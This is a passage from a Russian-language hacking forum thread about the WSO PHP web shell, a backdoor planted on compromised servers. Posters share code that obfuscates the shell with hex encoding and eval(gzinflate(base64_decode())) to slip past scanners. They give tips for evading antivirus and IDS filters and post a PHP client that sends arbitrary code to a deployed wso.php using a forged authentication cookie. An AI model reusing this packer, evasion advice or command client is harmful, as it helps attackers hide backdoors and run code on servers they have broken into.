Старый 15.07.2012, 11:00   #122
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от FIXER Посмотреть сообщение
хех, а тут его доработали и убрали увсэ баги )
Полюбому теперь в MoA попадет, к успеху идет же. А вообще ни капли не смешно, жалкое и унылое петросянство.
__________________
|

Последний раз редактировалось Boolean; 15.07.2012 в 11:12..
Boolean вне форума   Ответить с цитированием
Старый 15.07.2012, 11:50   #123
Qwazar
 
Регистрация: 09.07.2010
Сообщений: 376
Репутация: 154
По умолчанию

Цитата:
Сообщение от FIXER Посмотреть сообщение
хех, а тут его доработали и убрали увсэ баги )
Не примут. Каждый программист знает о преимуществе Y-m-d над жалкими d.m.Y и пр.
__________________
Мой блог: http://qwazar.ru/.
Qwazar вне форума   Ответить с цитированием
Старый 18.07.2012, 20:36   #124
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Цитата:
Php: 4.0.6
Ничего лучше, чем сделать банальную замену
Код:
$_SERVER -> $GLOBALS['HTTP_SERVER_VARS']
$_GET -> $GLOBALS['HTTP_GET_VARS']
$_POST -> $GLOBALS['HTTP_POST_VARS']
$_COOKIE -> $GLOBALS['HTTP_COOKIE_VARS']
$_FILES -> $GLOBALS['HTTP_POST_FILES']
не придумал.

Плюс отключить:
Код:
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
Не все, конечно, работает, но основной функционал есть.

Последний раз редактировалось Untitled; 18.07.2012 в 22:58..
Untitled вне форума   Ответить с цитированием
Старый 22.07.2012, 21:27   #125
slava1
 
Регистрация: 11.07.2012
Сообщений: 1
Репутация: -1
По умолчанию

Для тех кому интересна тема упаковки:
Код:
file_put_contents('wso2_hexencoded.php', 
   '<?php preg_replace("/.*/e","'.encode_string2hex('eval(gzinflate(base64_decode(\'').base64_encode(gzdeflate($file_content, 9)).encode_string2hex('\')))').'",".");'							
);

function encode_string2hex($string) {
	$hexstring = '';
	for ($i = 0; $i < strlen($string); $i++){
            $hexchar = bin2hex($string[$i]);
            $hexstring .= '\\x' .$hexchar;
    }
    return $hexstring;
}

Последний раз редактировалось slava1; 22.07.2012 в 22:48..
slava1 вне форума   Ответить с цитированием
Старый 03.08.2012, 13:15   #126
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Не могу запустить WSO на одном из серверов. После ввода пароля отдается HTTP/1.1 301 Moved Permanently и меня перекидывает на 404. Если убрать авторизацию - перекидывает сразу. PHP/5.2.17 + Suhosin Extension 0.9.32.1.
Untitled вне форума   Ответить с цитированием
Старый 03.08.2012, 13:19   #127
tipsy
 
Аватар для tipsy
 
Регистрация: 11.07.2010
Сообщений: 415
Репутация: 311
По умолчанию

Если шелл с дефолтным паролем, то это антивирус. Смени пароль.
Если пароль не дефолтный, допиши в начало phpinfo(); die;
Если так работает, переключай дефолтный режим с FileMan на другой и режь ему шапку - это IDS. Может палить по строкам "drwx", например.

Последний раз редактировалось tipsy; 03.08.2012 в 13:26..
tipsy вне форума   Ответить с цитированием
Старый 03.08.2012, 14:34   #128
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Ни пароль, ни режим не дефолтные. Посмотрел шапку - перекидывает, если preg_replace идет с модификатором "e". Различные ухищирения типа \x65, смена регулярки на аналогичные тоже не срабатывает. Плюс после ~10 фолов айпи улетает в бан.

И 99%, что все эти ошибки куда-нибудь логируются, да?

Последний раз редактировалось Untitled; 03.08.2012 в 15:06..
Untitled вне форума   Ответить с цитированием
Старый 03.08.2012, 19:20   #129
yesday
 
Регистрация: 28.11.2011
Сообщений: 36
Репутация: 12
По умолчанию

oRb , нужна твоя помощь.

Делаю так:
PHP код:
<?php 
$url 
'http://1.3.4.6/wso.php'
$password 'root'
$code ="phpinfo();"

$context stream_context_create(array('http' => 
    array( 
        
'method'  =>    'POST'
        
'header'  =>    "Content-type: application/x-www-form-urlencoded\r\n".
                        
'Cookie: 'md5(parse_url($urlPHP_URL_HOST)) . '=' md5($password)."\r\n",
        
'content' => http_build_query
            array( 
                
'a' => 'RC'
                
'p1' => $code,
                
'ne' => "1" 
            

        ) 
    ) 
)); 
echo 
file_get_contents($urlfalse$context);
?>
Ожидаю увидеть вывод phpinfo(); - а получаю код шелла. В чём может быть дело? (php без curlwrappers, поэтому header => ... так выглядит).

UPD: Разобрался, надо либо шифровать параметры, либо вырубать шифрование при формировании запроса. Код выше - поправил, тепреь работает.

Последний раз редактировалось yesday; 04.08.2012 в 23:51..
yesday вне форума   Ответить с цитированием
Старый 22.09.2012, 02:05   #130
recfrf
 
Регистрация: 30.07.2010
Сообщений: 40
Репутация: 1
По умолчанию

почему косячит поиск текста по файлам? находит лишь часть, например из 10 только 3.
Еще есть такая штука, пока не могу найти зависимость, если файл с текстом найден, переходим по найденной ссылке на файл, жмем редактировать, файл открывается и сразу сохраняется, стирая все, записывает при этом текст ".php"

Последний раз редактировалось recfrf; 22.09.2012 в 02:09..
recfrf вне форума   Ответить с цитированием
Ответ

Метки
shell, wso, wso2

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot